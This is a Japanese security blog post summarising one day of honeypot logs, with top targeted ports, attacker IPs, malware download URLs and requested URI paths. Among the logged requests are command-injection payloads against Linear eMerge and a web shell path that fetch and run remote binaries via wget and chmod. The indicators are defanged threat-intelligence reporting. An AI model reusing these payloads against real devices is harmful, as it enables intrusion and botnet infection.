sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeypot簡易分析(2020/1/22)

Honeypot簡易分析(2020/1/22)となります。

 

<Honeytrap>
Local Port Top 10
LocalPort Count
1433 405054 件
445 559 件
3389 154 件
3391 129 件
52869 76 件
8888 49 件
9000 45 件
8883 45 件

Remote IP Top 10

RemoteIP Count
103[.]78[.]215[.]58 29895 件
222[.]174[.]122[.]170 29878 件
117[.]6[.]97[.]90 29877 件
153[.]19[.]11[.]3 29865 件
212[.]111[.]205[.]80 29864 件
103[.]127[.]1[.]34 28653 件
94[.]43[.]128[.]98 21001 件
185[.]195[.]255[.]19 19665 件

Malware

Malware Count
No Malware 411287 件
hxxp://51[.]77[.]213[.]109/mips 13 件
hxxp://185[.]62[.]189[.]18/jaws[.]sh 1 件
hxxp://205[.]185[.]115[.]72/d 1 件
hxxp://128[.]199[.]251[.]119/webmin[.]php 1 件
hxxp://146[.]71[.]79[.]230/363A3EDC10A2930DVNICE/init[.]sh 1 件

 

<wowhoneypot>
URI Path
URI PATH Count
/ Target:- 33 件
/admin/assets/js/views/login[.]js Target:FreePBX 12 件
/admin/i18n/readme[.]txt Target:text 5 件
/recordings/theme/main[.]css Target:FreePBX 5 件
/admin/config[.]php Target:PHP 5 件
/robots[.]txt Target:text 2 件
hxxp://xxx[.]124[.]42[.]80:63435/ Target:new path 1 件
/card_scan_decoder[.]php Target:Linear eMerge E3-Series 1 件
/shell Target:wegshell 1 件
ip[.]ws[.]126[.]net:443 Target:Unauthorized Relay 1 件
hxxp://xxx[.]35[.]66[.]7:8088/index[.]php Target:new path 1 件

Remote IP Top 10
RemoteIP Count
77[.]247[.]108[.]77 20 件
77[.]247[.]108[.]119 7 件
167[.]99[.]40[.]21 3 件
74[.]63[.]227[.]26 2 件
65[.]154[.]226[.]100 2 件
193[.]57[.]40[.]46 2 件
2[.]183[.]126[.]102 1 件
60[.]191[.]52[.]254 1 件x

All URI
URI Count
/ Target:- 32 件
/admin/assets/js/views/login[.]js Target:FreePBX 12 件
/admin/i18n/readme[.]txt Target:text 5 件
/recordings/theme/main[.]css Target:FreePBX 5 件
/admin/config[.]php Target:PHP 5 件
/robots[.]txt Target:text 2 件
hxxp://xxx[.]124[.]42[.]80:63435/ Target:new path 1 件
/card_scan_decoder[.]php?No=30&door=wgethxxp://switchnets[.]net/hoho[.]arm7;chmod777hoho[.]arm7;[.]/hoho[.]arm7linear Target:Linear eMerge E3-Series 1 件
/shell?cd+/tmp;rm+-rf+[.]j;wget+hxxp:/\/91[.]92[.]66[.]124/[.][.]j/[.]j;chmod+777+[.]j;sh+[.]j;echo+DONE Target:wegshell 1 件
ip[.]ws[.]126[.]net:443 Target:Unauthorized Relay 1 件
hxxp://xxx[.]35[.]66[.]7:8088/index[.]php Target:new path 1 件
/?XDEBUG_SESSION_START=phpstorm Target:new path 1

<wowhoneypotssl>
URI Path
URI PATH Count
/admin/assets/js/views/login[.]js Target:FreePBX 12 件
/admin/i18n/readme[.]txt Target:text 5 件
/recordings/theme/main[.]css Target:FreePBX 5 件
/admin/config[.]php Target:PHP 5 件
/ Target:- 4 件
/ajax Target:new path 1 件
/x Target:new path 1 件
/rest/v1/AccountService/Accounts Target:new path 1 件

Remote IP Top 10
RemoteIP Count
77[.]247[.]108[.]77 20 件
77[.]247[.]108[.]119 7 件
172[.]105[.]89[.]161 1 件
5[.]8[.]10[.]202 1 件
169[.]197[.]108[.]38 1 件
74[.]82[.]47[.]5 1 件
45[.]56[.]78[.]64 1 件
104[.]203[.]93[.]2 1 件

All URI
URI Count
/admin/assets/js/views/login[.]js Target:FreePBX 12 件
/admin/i18n/readme[.]txt Target:text 5 件
/recordings/theme/main[.]css Target:FreePBX 5 件
/admin/config[.]php Target:PHP 5 件
/ Target:- 4 件
/ajax Target:new path 1 件
/x Target:new path 1 件
/rest/v1/AccountService/Accounts Target:new path 1 件